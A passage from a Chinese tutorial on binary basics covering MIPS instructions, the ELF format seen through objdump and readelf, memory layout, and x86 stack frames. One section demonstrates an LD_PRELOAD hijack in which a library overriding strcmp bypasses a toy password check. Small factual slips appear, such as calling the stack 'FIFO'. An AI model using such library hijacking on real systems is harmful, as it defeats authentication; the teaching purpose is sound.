; u 为不带符号加 sub/subu :把两个定点寄存器的内容相减 div/divu : 两个定点寄存器的内容相除 mul/mulu : 两个定点寄存器的内容相乘 and/andi : 与运算,两个寄存器中的内容相与
and $1,$2,$3($1=$2 & $3)
;i为立即数。 or/ori : 或运算。 xor/xori : 异或运算。 beq/beqz/benz/bne : 条件转移 eq 相等,z 零,ne 不等 j/jr/jal/jalr : j 直接跳转;jr 使用寄存器跳转 lui : 把一个 16 位的立即数填入到寄存器的高 16 位,低 16 位补零 sll/srl : 逻辑 左移 / 右移
sll $1,$2,#2
slt/slti/sltui : 如果 $2
的值小于 $3
,那么设置 $1
的值为 1,否则设置 $1
的值为 0
slt $1,$2,$3
mov/movz/movn : 复制,n 为负,z 为零
mov $1,$2; movz $1,$2,$3
( $3
为零则复制 $2
到 $1
) trap : 根据地址向量转入管态 eret : 从异常中返回到用户态
Linux ELF
一个实例
在 1.5.1节 C语言基础 中我们看到了从源代码到可执行文件的全过程,现在我们来看一个更复杂的例子。
#include<stdio.h>
int global_init_var = 10;
int global_uninit_var;
void func(int sum) {
printf("%d\n", sum);
}
void main(void) {
static int local_static_init_var = 20;
static int local_static_uninit_var;
int local_init_val = 30;
int local_uninit_var;
func(global_init_var + local_init_val +
local_static_init_var );
}
然后分别执行下列命令生成三个文件:
gcc -m32 -c elfDemo.c -o elfDemo.o
gcc -m32 elfDemo.c -o elfDemo.out
gcc -m32 -static elfDemo.c -o elfDemo_static.out
使用 ldd 命令打印所依赖的共享库:
$ ldd elfDemo.out
linux-gate.so.1 (0xf77b1000)
libc.so.6 => /usr/lib32/libc.so.6 (0xf7597000)
/lib/ld-linux.so.2 => /usr/lib/ld-linux.so.2 (0xf77b3000)
$ ldd elfDemo_static.out
not a dynamic executable
elfDemo_static.out 采用了静态链接的方式。
使用 file 命令查看相应的文件格式:
$ file elfDemo.o
elfDemo.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
$ file elfDemo.out
elfDemo.out: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=50036015393a99344897cbf34099256c3793e172, not stripped
$ file elfDemo_static.out
elfDemo_static.out: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=276c839c20b4c187e4b486cf96d82a90c40f4dae, not stripped
$ file -L /usr/lib32/libc.so.6
/usr/lib32/libc.so.6: ELF 32-bit LSB shared object, Intel 80386, version 1 (GNU/Linux), dynamically linked, interpreter /usr/lib32/ld-linux.so.2, BuildID[sha1]=ee88d1b2aa81f104ab5645d407e190b244203a52, for GNU/Linux 3.2.0, not stripped
于是我们得到了 Linux 可执行文件格式 ELF (Executable Linkable Format)文件的三种类型:
- 可重定位文件(Relocatable file)
- 包含了代码和数据,可以和其他目标文件链接生成一个可执行文件或共享目标文件。
- elfDemo.o
- 可执行文件(Executable File)
- 包含了可以直接执行的文件。
- elfDemo_static.out
- 共享目标文件(Shared Object File)
- 包含了用于链接的代码和数据,分两种情况。一种是链接器将其与其他的可重定位文件和共享目标文件链接起来,生产新的目标文件。另一种是动态链接器将多个共享目标文件与可执行文件结合,作为进程映像的一部分。
- elfDemo.out
libc-2.25.so
此时他们的结构如图:
可以看到,在这个简化的 ELF 文件中,开头是一个“文件头”,之后分别是代码段、数据段和.bss段。程序源代码编译后,执行语句变成机器指令,保存在.text
段;已初始化的全局变量和局部静态变量都保存在.data
段;未初始化的全局变量和局部静态变量则放在.bss
段。
把程序指令和程序数据分开存放有许多好处,从安全的角度讲,当程序被加载后,数据和指令分别被映射到两个虚拟区域。由于数据区域对于进程来说是可读写的,而指令区域对于进程来说是只读的,所以这两个虚存区域的权限可以被分别设置成可读写和只读,可以防止程序的指令被改写和利用。
elfDemo.o
接下来,我们更深入地探索目标文件,使用 objdump 来查看目标文件的内部结构:
$ objdump -h elfDemo.o
elfDemo.o: file format elf32-i386
Sections:
Idx Name Size VMA LMA File off Algn
0 .group 00000008 00000000 00000000 00000034 2**2
CONTENTS, READONLY, GROUP, LINK_ONCE_DISCARD
1 .text 00000078 00000000 00000000 0000003c 2**0
CONTENTS, ALLOC, LOAD, RELOC, READONLY, CODE
2 .data 00000008 00000000 00000000 000000b4 2**2
CONTENTS, ALLOC, LOAD, DATA
3 .bss 00000004 00000000 00000000 000000bc 2**2
ALLOC
4 .rodata 00000004 00000000 00000000 000000bc 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
5 .text.__x86.get_pc_thunk.ax 00000004 00000000 00000000 000000c0 2**0
CONTENTS, ALLOC, LOAD, READONLY, CODE
6 .comment 00000012 00000000 00000000 000000c4 2**0
CONTENTS, READONLY
7 .note.GNU-stack 00000000 00000000 00000000 000000d6 2**0
CONTENTS, READONLY
8 .eh_frame 0000007c 00000000 00000000 000000d8 2**2
CONTENTS, ALLOC, LOAD, RELOC, READONLY, DATA
可以看到目标文件中除了最基本的代码段、数据段和 BSS 段以外,还有一些别的段。注意到 .bss 段没有 CONTENTS
属性,表示它实际上并不存在,.bss 段只是为为未初始化的全局变量和局部静态变量预留了位置而已。
代码段
$ objdump -x -s -d elfDemo.o
......
Sections:
Idx Name Size VMA LMA File off Algn
......
1 .text 00000078 00000000 00000000 0000003c 2**0
CONTENTS, ALLOC, LOAD, RELOC, READONLY, CODE
......
Contents of section .text:
0000 5589e553 83ec04e8 fcffffff 05010000 U..S............
0010 0083ec08 ff75088d 90000000 005289c3 .....u.......R..
0020 e8fcffff ff83c410 908b5dfc c9c38d4c ..........]....L
0030 240483e4 f0ff71fc 5589e551 83ec14e8 $.....q.U..Q....
0040 fcffffff 05010000 00c745f4 1e000000 ..........E.....
0050 8b880000 00008b55 f401ca8b 80040000 .......U........
0060 0001d083 ec0c50e8 fcffffff 83c41090 ......P.........
0070 8b4dfcc9 8d61fcc3 .M...a..
......
Disassembly of section .text:
00000000 <func>:
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 53 push %ebx
4: 83 ec 04 sub $0x4,%esp
7: e8 fc ff ff ff call 8 <func+0x8>
8: R_386_PC32 __x86.get_pc_thunk.ax
c: 05 01 00 00 00 add $0x1,%eax
d: R_386_GOTPC _GLOBAL_OFFSET_TABLE_
11: 83 ec 08 sub $0x8,%esp
14: ff 75 08 pushl 0x8(%ebp)
17: 8d 90 00 00 00 00 lea 0x0(%eax),%edx
19: R_386_GOTOFF .rodata
1d: 52 push %edx
1e: 89 c3 mov %eax,%ebx
20: e8 fc ff ff ff call 21 <func+0x21>
21: R_386_PLT32 printf
25: 83 c4 10 add $0x10,%esp
28: 90 nop
29: 8b 5d fc mov -0x4(%ebp),%ebx
2c: c9 leave
2d: c3 ret
0000002e <main>:
2e: 8d 4c 24 04 lea 0x4(%esp),%ecx
32: 83 e4 f0 and $0xfffffff0,%esp
35: ff 71 fc pushl -0x4(%ecx)
38: 55 push %ebp
39: 89 e5 mov %esp,%ebp
3b: 51 push %ecx
3c: 83 ec 14 sub $0x14,%esp
3f: e8 fc ff ff ff call 40 <main+0x12>
40: R_386_PC32 __x86.get_pc_thunk.ax
44: 05 01 00 00 00 add $0x1,%eax
45: R_386_GOTPC _GLOBAL_OFFSET_TABLE_
49: c7 45 f4 1e 00 00 00 movl $0x1e,-0xc(%ebp)
50: 8b 88 00 00 00 00 mov 0x0(%eax),%ecx
52: R_386_GOTOFF global_init_var
56: 8b 55 f4 mov -0xc(%ebp),%edx
59: 01 ca add %ecx,%edx
5b: 8b 80 04 00 00 00 mov 0x4(%eax),%eax
5d: R_386_GOTOFF .data
61: 01 d0 add %edx,%eax
63: 83 ec 0c sub $0xc,%esp
66: 50 push %eax
67: e8 fc ff ff ff call 68 <main+0x3a>
68: R_386_PC32 func
6c: 83 c4 10 add $0x10,%esp
6f: 90 nop
70: 8b 4d fc mov -0x4(%ebp),%ecx
73: c9 leave
74: 8d 61 fc lea -0x4(%ecx),%esp
77: c3 ret
Contents of section .text
是 .text
的数据的十六进制形式,总共 0x78 个字节,最左边一列是偏移量,中间 4 列是内容,最右边一列是 ASCII 码形式。下面的 Disassembly of section .text
是反汇编结果。
数据段和只读数据段
......
Sections:
Idx Name Size VMA LMA File off Algn
2 .data 00000008 00000000 00000000 000000b4 2**2
CONTENTS, ALLOC, LOAD, DATA
4 .rodata 00000004 00000000 00000000 000000bc 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
......
Contents of section .data:
0000 0a000000 14000000 ........
Contents of section .rodata:
0000 25640a00 %d..
.......
.data
段保存已经初始化了的全局变量和局部静态变量。elfDemo.c
中共有两个这样的变量,global_init_var
和 local_static_init_var
,每个变量 4 个字节,一共 8 个字节。由于小端序的原因,0a000000
表示 global_init_var
值(10
)的十六进制 0x0a
,14000000
表示 local_static_init_var
值(20
)的十六进制 0x14
。
.rodata
段保存只读数据,包括只读变量和字符串常量。elfDemo.c
中调用 printf
的时候,用到了一个字符串变量 %d\n
,它是一种只读数据,保存在 .rodata
段中,可以从输出结果看到字符串常量的 ASCII 形式,以 \0
结尾。
BSS段
Sections:
Idx Name Size VMA LMA File off Algn
3 .bss 00000004 00000000 00000000 000000bc 2**2
ALLOC
.bss
段保存未初始化的全局变量和局部静态变量。
ELF 文件结构
对象文件参与程序链接(构建程序)和程序执行(运行程序)。ELF 结构几相关信息在 /usr/include/elf.h
文件中。
- ELF 文件头(ELF Header) 在目标文件格式的最前面,包含了描述整个文件的基本属性。
- 程序头表(Program Header Table) 是可选的,它告诉系统怎样创建一个进程映像。可执行文件必须有程序头表,而重定位文件不需要。
- 段(Section) 包含了链接视图中大量的目标文件信息。
- 段表(Section Header Table) 包含了描述文件中所有段的信息。
32位数据类型
名称 | 长度 | 对其 | 描述 | 原始类型 |
---|---|---|---|---|
Elf32_Addr | 4 | 4 | 无符号程序地址 | uint32_t |
Elf32_Half | 2 | 2 | 无符号短整型 | uint16_t |
Elf32_Off | 4 | 4 | 无符号偏移地址 | uint32_t |
Elf32_Sword | 4 | 4 | 有符号整型 | int32_t |
Elf32_Word | 4 | 4 | 无符号整型 | uint32_t |
文件头
ELF 文件头必然存在于 ELF 文件的开头,表明这是一个 ELF 文件。定义如下:
typedef struct
{
unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
Elf32_Half e_type; /* Object file type */
Elf32_Half e_machine; /* Architecture */
Elf32_Word e_version; /* Object file version */
Elf32_Addr e_entry; /* Entry point virtual address */
Elf32_Off e_phoff; /* Program header table file offset */
Elf32_Off e_shoff; /* Section header table file offset */
Elf32_Word e_flags; /* Processor-specific flags */
Elf32_Half e_ehsize; /* ELF header size in bytes */
Elf32_Half e_phentsize; /* Program header table entry size */
Elf32_Half e_phnum; /* Program header table entry count */
Elf32_Half e_shentsize; /* Section header table entry size */
Elf32_Half e_shnum; /* Section header table entry count */
Elf32_Half e_shstrndx; /* Section header string table index */
} Elf32_Ehdr;
typedef struct
{
unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
Elf64_Half e_type; /* Object file type */
Elf64_Half e_machine; /* Architecture */
Elf64_Word e_version; /* Object file version */
Elf64_Addr e_entry; /* Entry point virtual address */
Elf64_Off e_phoff; /* Program header table file offset */
Elf64_Off e_shoff; /* Section header table file offset */
Elf64_Word e_flags; /* Processor-specific flags */
Elf64_Half e_ehsize; /* ELF header size in bytes */
Elf64_Half e_phentsize; /* Program header table entry size */
Elf64_Half e_phnum; /* Program header table entry count */
Elf64_Half e_shentsize; /* Section header table entry size */
Elf64_Half e_shnum; /* Section header table entry count */
Elf64_Half e_shstrndx; /* Section header string table index */
} Elf64_Ehdr;
e_ident
保存着 ELF 的幻数和其他信息,最前面四个字节是幻数,用字符串表示为 \177ELF
,其后的字节如果是 32 位则是 ELFCLASS32 (1),如果是 64 位则是 ELFCLASS64 (2),再其后的字节表示端序,小端序为 ELFDATA2LSB (1),大端序为 ELFDATA2LSB (2)。最后一个字节则表示 ELF 的版本。
现在我们使用 readelf 命令来查看 elfDome.out 的文件头:
$ readelf -h elfDemo.out
ELF Header:
Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: DYN (Shared object file)
Machine: Intel 80386
Version: 0x1
Entry point address: 0x3e0
Start of program headers: 52 (bytes into file)
Start of section headers: 6288 (bytes into file)
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 9
Size of section headers: 40 (bytes)
Number of section headers: 30
Section header string table index: 29
程序头
程序头表是由 ELF 头的 e_phoff
指定的偏移量和 e_phentsize
、e_phnum
共同确定大小的表格组成。e_phentsize
表示表格中程序头的大小,e_phnum
表示表格中程序头的数量。
程序头的定义如下:
typedef struct
{
Elf32_Word p_type; /* Segment type */
Elf32_Off p_offset; /* Segment file offset */
Elf32_Addr p_vaddr; /* Segment virtual address */
Elf32_Addr p_paddr; /* Segment physical address */
Elf32_Word p_filesz; /* Segment size in file */
Elf32_Word p_memsz; /* Segment size in memory */
Elf32_Word p_flags; /* Segment flags */
Elf32_Word p_align; /* Segment alignment */
} Elf32_Phdr;
typedef struct
{
Elf64_Word p_type; /* Segment type */
Elf64_Word p_flags; /* Segment flags */
Elf64_Off p_offset; /* Segment file offset */
Elf64_Addr p_vaddr; /* Segment virtual address */
Elf64_Addr p_paddr; /* Segment physical address */
Elf64_Xword p_filesz; /* Segment size in file */
Elf64_Xword p_memsz; /* Segment size in memory */
Elf64_Xword p_align; /* Segment alignment */
} Elf64_Phdr;
使用 readelf 来查看程序头:
$ readelf -l elfDemo.out
Elf file type is DYN (Shared object file)
Entry point 0x3e0
There are 9 program headers, starting at offset 52
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x00000034 0x00000034 0x00120 0x00120 R E 0x4
INTERP 0x000154 0x00000154 0x00000154 0x00013 0x00013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x00000000 0x00000000 0x00780 0x00780 R E 0x1000
LOAD 0x000ef4 0x00001ef4 0x00001ef4 0x00130 0x0013c RW 0x1000
DYNAMIC 0x000efc 0x00001efc 0x00001efc 0x000f0 0x000f0 RW 0x4
NOTE 0x000168 0x00000168 0x00000168 0x00044 0x00044 R 0x4
GNU_EH_FRAME 0x000624 0x00000624 0x00000624 0x00044 0x00044 R 0x4
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x10
GNU_RELRO 0x000ef4 0x00001ef4 0x00001ef4 0x0010c 0x0010c R 0x1
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame
03 .init_array .fini_array .dynamic .got .got.plt .data .bss
04 .dynamic
05 .note.ABI-tag .note.gnu.build-id
06 .eh_frame_hdr
07
08 .init_array .fini_array .dynamic .got
段
段表(Section Header Table)是一个以 Elf32_Shdr
结构体为元素的数组,每个结构体对应一个段,它描述了各个段的信息。ELF 文件头的 e_shoff
成员给出了段表在 ELF 中的偏移,e_shnum
成员给出了段描述符的数量,e_shentsize
给出了每个段描述符的大小。
typedef struct
{
Elf32_Word sh_name; /* Section name (string tbl index) */
Elf32_Word sh_type; /* Section type */
Elf32_Word sh_flags; /* Section flags */
Elf32_Addr sh_addr; /* Section virtual addr at execution */
Elf32_Off sh_offset; /* Section file offset */
Elf32_Word sh_size; /* Section size in bytes */
Elf32_Word sh_link; /* Link to another section */
Elf32_Word sh_info; /* Additional section information */
Elf32_Word sh_addralign; /* Section alignment */
Elf32_Word sh_entsize; /* Entry size if section holds table */
} Elf32_Shdr;
typedef struct
{
Elf64_Word sh_name; /* Section name (string tbl index) */
Elf64_Word sh_type; /* Section type */
Elf64_Xword sh_flags; /* Section flags */
Elf64_Addr sh_addr; /* Section virtual addr at execution */
Elf64_Off sh_offset; /* Section file offset */
Elf64_Xword sh_size; /* Section size in bytes */
Elf64_Word sh_link; /* Link to another section */
Elf64_Word sh_info; /* Additional section information */
Elf64_Xword sh_addralign; /* Section alignment */
Elf64_Xword sh_entsize; /* Entry size if section holds table */
} Elf64_Shdr;
使用 readelf 命令查看目标文件中完整的段:
$ readelf -S elfDemo.o
There are 15 section headers, starting at offset 0x41c:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .group GROUP 00000000 000034 000008 04 12 16 4
[ 2] .text PROGBITS 00000000 00003c 000078 00 AX 0 0 1
[ 3] .rel.text REL 00000000 000338 000048 08 I 12 2 4
[ 4] .data PROGBITS 00000000 0000b4 000008 00 WA 0 0 4
[ 5] .bss NOBITS 00000000 0000bc 000004 00 WA 0 0 4
[ 6] .rodata PROGBITS 00000000 0000bc 000004 00 A 0 0 1
[ 7] .text.__x86.get_p PROGBITS 00000000 0000c0 000004 00 AXG 0 0 1
[ 8] .comment PROGBITS 00000000 0000c4 000012 01 MS 0 0 1
[ 9] .note.GNU-stack PROGBITS 00000000 0000d6 000000 00 0 0 1
[10] .eh_frame PROGBITS 00000000 0000d8 00007c 00 A 0 0 4
[11] .rel.eh_frame REL 00000000 000380 000018 08 I 12 10 4
[12] .symtab SYMTAB 00000000 000154 000140 10 13 13 4
[13] .strtab STRTAB 00000000 000294 0000a2 00 0 0 1
[14] .shstrtab STRTAB 00000000 000398 000082 00 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
L (link order), O (extra OS processing required), G (group), T (TLS),
C (compressed), x (unknown), o (OS specific), E (exclude),
p (processor specific)
注意,ELF 段表的第一个元素是被保留的,类型为 NULL。
字符串表
字符串表以段的形式存在,包含了以 null 结尾的字符序列。对象文件使用这些字符串来表示符号和段名称,引用字符串时只需给出在表中的偏移即可。字符串表的第一个字符和最后一个字符为空字符,以确保所有字符串的开始和终止。通常段名为 .strtab
的字符串表是 字符串表(Strings Table),段名为 .shstrtab
的是段表字符串表(Section Header String Table)。
偏移 | +0 | +1 | +2 | +3 | +4 | +5 | +6 | +7 | +8 | +9 |
---|---|---|---|---|---|---|---|---|---|---|
+0 | \0 | h | e | l | l | o | \0 | w | o | r |
+10 | l | d | \0 | h | e | l | l | o | w | o |
+20 | r | l | d | \0 |
偏移 | 字符串 |
---|---|
0 | 空字符串 |
1 | hello |
7 | world |
13 | helloworld |
18 | world |
可以使用 readelf 读取这两个表:
$ readelf -x .strtab elfDemo.o
Hex dump of section '.strtab':
0x00000000 00656c66 44656d6f 2e63006c 6f63616c .elfDemo.c.local
0x00000010 5f737461 7469635f 696e6974 5f766172 _static_init_var
0x00000020 2e323139 35006c6f 63616c5f 73746174 .2195.local_stat
0x00000030 69635f75 6e696e69 745f7661 722e3231 ic_uninit_var.21
0x00000040 39360067 6c6f6261 6c5f696e 69745f76 96.global_init_v
0x00000050 61720067 6c6f6261 6c5f756e 696e6974 ar.global_uninit
0x00000060 5f766172 0066756e 63005f5f 7838362e _var.func.__x86.
0x00000070 6765745f 70635f74 68756e6b 2e617800 get_pc_thunk.ax.
0x00000080 5f474c4f 42414c5f 4f464653 45545f54 _GLOBAL_OFFSET_T
0x00000090 41424c45 5f007072 696e7466 006d6169 ABLE_.printf.mai
0x000000a0 6e00
$ readelf -x .shstrtab elfDemo.o
Hex dump of section '.shstrtab':
0x00000000 002e7379 6d746162 002e7374 72746162 ..symtab..strtab
0x00000010 002e7368 73747274 6162002e 72656c2e ..shstrtab..rel.
0x00000020 74657874 002e6461 7461002e 62737300 text..data..bss.
0x00000030 2e726f64 61746100 2e746578 742e5f5f .rodata..text.__
0x00000040 7838362e 6765745f 70635f74 68756e6b x86.get_pc_thunk
0x00000050 2e617800 2e636f6d 6d656e74 002e6e6f .ax..comment..no
0x00000060 74652e47 4e552d73 7461636b 002e7265 te.GNU-stack..re
0x00000070 6c2e6568 5f667261 6d65002e 67726f75 l.eh_frame..grou
0x00000080 7000
符号表
目标文件的符号表保存了定位和重定位程序的符号定义和引用所需的信息。符号表索引是这个数组的下标。索引0指向表中的第一个条目,作为未定义的符号索引。
typedef struct
{
Elf32_Word st_name; /* Symbol name (string tbl index) */
Elf32_Addr st_value; /* Symbol value */
Elf32_Word st_size; /* Symbol size */
unsigned char st_info; /* Symbol type and binding */
unsigned char st_other; /* Symbol visibility */
Elf32_Section st_shndx; /* Section index */
} Elf32_Sym;
typedef struct
{
Elf64_Word st_name; /* Symbol name (string tbl index) */
unsigned char st_info; /* Symbol type and binding */
unsigned char st_other; /* Symbol visibility */
Elf64_Section st_shndx; /* Section index */
Elf64_Addr st_value; /* Symbol value */
Elf64_Xword st_size; /* Symbol size */
} Elf64_Sym;
查看符号表:
$ readelf -s elfDemo.o
Symbol table '.symtab' contains 20 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
1: 00000000 0 FILE LOCAL DEFAULT ABS elfDemo.c
2: 00000000 0 SECTION LOCAL DEFAULT 2
3: 00000000 0 SECTION LOCAL DEFAULT 4
4: 00000000 0 SECTION LOCAL DEFAULT 5
5: 00000000 0 SECTION LOCAL DEFAULT 6
6: 00000004 4 OBJECT LOCAL DEFAULT 4 local_static_init_var.219
7: 00000000 4 OBJECT LOCAL DEFAULT 5 local_static_uninit_var.2
8: 00000000 0 SECTION LOCAL DEFAULT 7
9: 00000000 0 SECTION LOCAL DEFAULT 9
10: 00000000 0 SECTION LOCAL DEFAULT 10
11: 00000000 0 SECTION LOCAL DEFAULT 8
12: 00000000 0 SECTION LOCAL DEFAULT 1
13: 00000000 4 OBJECT GLOBAL DEFAULT 4 global_init_var
14: 00000004 4 OBJECT GLOBAL DEFAULT COM global_uninit_var
15: 00000000 46 FUNC GLOBAL DEFAULT 2 func
16: 00000000 0 FUNC GLOBAL HIDDEN 7 __x86.get_pc_thunk.ax
17: 00000000 0 NOTYPE GLOBAL DEFAULT UND _GLOBAL_OFFSET_TABLE_
18: 00000000 0 NOTYPE GLOBAL DEFAULT UND printf
19: 0000002e 74 FUNC GLOBAL DEFAULT 2 main
重定位
重定位是连接符号定义与符号引用的过程。可重定位文件必须具有描述如何修改段内容的信息,从而运行可执行文件和共享对象文件保存进程程序映像的正确信息。
typedef struct
{
Elf32_Addr r_offset; /* Address */
Elf32_Word r_info; /* Relocation type and symbol index */
} Elf32_Rel;
typedef struct
{
Elf64_Addr r_offset; /* Address */
Elf64_Xword r_info; /* Relocation type and symbol index */
Elf64_Sxword r_addend; /* Addend */
} Elf64_Rela;
查看重定位表:
$ readelf -r elfDemo.o
Relocation section '.rel.text' at offset 0x338 contains 9 entries:
Offset Info Type Sym.Value Sym. Name
00000008 00001002 R_386_PC32 00000000 __x86.get_pc_thunk.ax
0000000d 0000110a R_386_GOTPC 00000000 _GLOBAL_OFFSET_TABLE_
00000019 00000509 R_386_GOTOFF 00000000 .rodata
00000021 00001204 R_386_PLT32 00000000 printf
00000040 00001002 R_386_PC32 00000000 __x86.get_pc_thunk.ax
00000045 0000110a R_386_GOTPC 00000000 _GLOBAL_OFFSET_TABLE_
00000052 00000d09 R_386_GOTOFF 00000000 global_init_var
0000005d 00000309 R_386_GOTOFF 00000000 .data
00000068 00000f02 R_386_PC32 00000000 func
Relocation section '.rel.eh_frame' at offset 0x380 contains 3 entries:
Offset Info Type Sym.Value Sym. Name
00000020 00000202 R_386_PC32 00000000 .text
00000044 00000202 R_386_PC32 00000000 .text
00000070 00000802 R_386_PC32 00000000 .text.__x86.get_pc_thu
动态链接
动态链接相关的环境变量
LD_PRELOAD
LD_PRELOAD 环境变量可以定义在程序运行前优先加载的动态链接库。这使得我们可以有选择性地加载不同动态链接库中的相同函数,即通过设置该变量,在主程序和其动态链接库中间加载别的动态链接库,甚至覆盖原本的库。这就有可能出现劫持程序执行的安全问题。
#include<stdio.h>
#include<string.h>
void main() {
char passwd[] = "password";
char str[128];
scanf("%s", &str);
if (!strcmp(passwd, str)) {
printf("correct\n");
return;
}
printf("invalid\n");
}
下面我们构造一个恶意的动态链接库来重载 strcmp()
函数,编译为动态链接库,并设置 LD_PRELOAD 环境变量:
$ cat hack.c
#include<stdio.h>
#include<stdio.h>
int strcmp(const char *s1, const char *s2) {
printf("hacked\n");
return 0;
}
$ gcc -shared -o hack.so hack.c
$ gcc ldpreload.c
$ ./a.out
asdf
invalid
$ LD_PRELOAD="./hack.so" ./a.out
asdf
hacked
correct
LD_SHOW_AUXV
AUXV 是内核在执行 ELF 文件时传递给用户空间的信息,设置该环境变量可以显示这些信息。如:
$ LD_SHOW_AUXV=1 ls
AT_SYSINFO_EHDR: 0x7fff41fbc000
AT_HWCAP: bfebfbff
AT_PAGESZ: 4096
AT_CLKTCK: 100
AT_PHDR: 0x55f1f623e040
AT_PHENT: 56
AT_PHNUM: 9
AT_BASE: 0x7f277e1ec000
AT_FLAGS: 0x0
AT_ENTRY: 0x55f1f6243060
AT_UID: 1000
AT_EUID: 1000
AT_GID: 1000
AT_EGID: 1000
AT_SECURE: 0
AT_RANDOM: 0x7fff41effbb9
AT_EXECFN: /usr/bin/ls
AT_PLATFORM: x86_64
内存管理
什么是内存
为了使用户程序在运行时具有一个私有的地址空间、有自己的 CPU,就像独占了整个计算机一样,现代操作系统提出了虚拟内存的概念。
虚拟内存的主要作用主要为三个:
- 它将内存看做一个存储在磁盘上的地址空间的高速缓存,在内存中只保存活动区域,并根据需要在磁盘和内存之间来回传送数据。
- 它为每个进程提供了一致的地址空间。
- 它保护了每个进程的地址空间不被其他进程破坏。
现代操作系统采用虚拟寻址的方式,CPU 通过生成一个虚拟地址(Virtual Address(VA))来访问内存,然后这个虚拟地址通过内存管理单元(Memory Management Unit(MMU))转换成物理地址之后被送到存储器。
前面我们已经看到可执行文件被映射到了内存中,Linux 为每个进程维持了一个单独的虚拟地址空间,包括了 .text、.data、.bss、栈(stack)、堆(heap),共享库等内容。
32 位系统有 4GB 的地址空间,其中 0x08048000~0xbfffffff 是用户空间(3GB),0xc0000000~0xffffffff 是内核空间(1GB)。
栈与调用约定
栈
栈是一个先入后出(First In Last Out(FIFO))的容器。用于存放函数返回地址及参数、临时变量和有关上下文的内容。程序在调用函数时,操作系统会自动通过压栈和弹栈完成保存函数现场等操作,不需要程序员手动干预。
栈由高地址向低地址增长,栈保存了一个函数调用所需要的维护信息,称为堆栈帧(Stack Frame)在 x86 体系中,寄存器 ebp
指向堆栈帧的底部,esp
指向堆栈帧的顶部。压栈时栈顶地址减小,弹栈时栈顶地址增大。
PUSH
:用于压栈。将esp
减 4,然后将其唯一操作数的内容写入到esp
指向的内存地址POP
:用于弹栈。从esp
指向的内存地址获得数据,将其加载到指令操作数(通常是一个寄存器)中,然后将esp
加 4。
x86 体系下函数的调用总是这样的:
- 把所有或一部分参数压入栈中,如果有其他参数没有入栈,那么使用某些特定的寄存器传递。
- 把当前指令的下一条指令的地址压入栈中。
- 跳转到函数体执行。
其中第 2 步和第 3 步由指令 call
一起执行。跳转到函数体之后即开始执行函数,而 x86 函数体的开头是这样的:
push ebp
:把ebp压入栈中(old ebp)。mov ebp, esp
:ebp=esp(这时ebp指向栈顶,而此时栈顶就是old ebp)- [可选]
sub esp, XXX
:在栈上分配 XXX 字节的临时空间。 - [可选]
push XXX
:保存名为 XXX 的寄存器。
把ebp压入栈中,是为了在函数返回时恢复以前的ebp值,而压入寄存器的值,是为了保持某些寄存器在函数调用前后保存不变。函数返回时的操作与开头正好相反:
- [可选]
pop XXX
:恢复保存的寄存器。 mov esp, ebp
:恢复esp同时回收局部变量空间。pop ebp
:恢复保存的ebp的值。ret
:从栈中取得返回地址,并跳转到该位置。
栈帧对应的汇编代码:
PUSH ebp ; 函数开始(使用ebp前先把已有值保存到栈中)
MOV ebp, esp ; 保存当前esp到ebp中
... ; 函数体
; 无论esp值如何变化,ebp都保持不变,可以安全访问函数的局部变量、参数
MOV esp, ebp ; 将函数的其实地址返回到esp中
POP ebp ; 函数返回前弹出保存在栈中的ebp值
RET ; 函数返回并跳转
函数调用后栈的标准布局如下图:
我们来看一个例子:源码
#include<stdio.h>
int add(int a, int b) {
int x = a, y = b;
return (x + y);
}
int main() {
int a = 1, b = 2;
printf("%d\n", add(a, b));
return 0;
}
使用 gdb 查看对应的汇编代码,这里我们给出了详细的注释:
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x00000563 <+0>: lea ecx,[esp+0x4] ;将 esp+0x4 的地址传给 ecx
0x00000567 <+4>: and esp,0xfffffff0 ;栈 16 字节对齐
0x0000056a <+7>: push DWORD PTR [ecx-0x4] ;ecx-0x4,即原 esp 强制转换为双字数据后压入栈中
0x0000056d <+10>: push ebp ;保存调用 main() 函数之前的 ebp,由于在 _start 中将 ebp 清零了,这里的 ebp=0x0
0x0000056e <+11>: mov ebp,esp ;把调用 main() 之前的 esp 作为当前栈帧的 ebp
0x00000570 <+13>: push ebx ;ebx、ecx 入栈
0x00000571 <+14>: push ecx
0x00000572 <+15>: sub esp,0x10 ;为局部变量 a、b 分配空间并做到 16 字节对齐
0x00000575 <+18>: call 0x440 <__x86.get_pc_thunk.bx> ;调用 <__x86.get_pc_thunk.bx> 函数,将 esp 强制转换为双字数据后保存到 ebx
0x0000057a <+23>: add ebx,0x1a86 ;ebx+0x1a86
0x00000580 <+29>: mov DWORD PTR [ebp-0x10],0x1 ;a 第二个入栈所以保存在 ebp-0x10 的位置,此句即 a=1
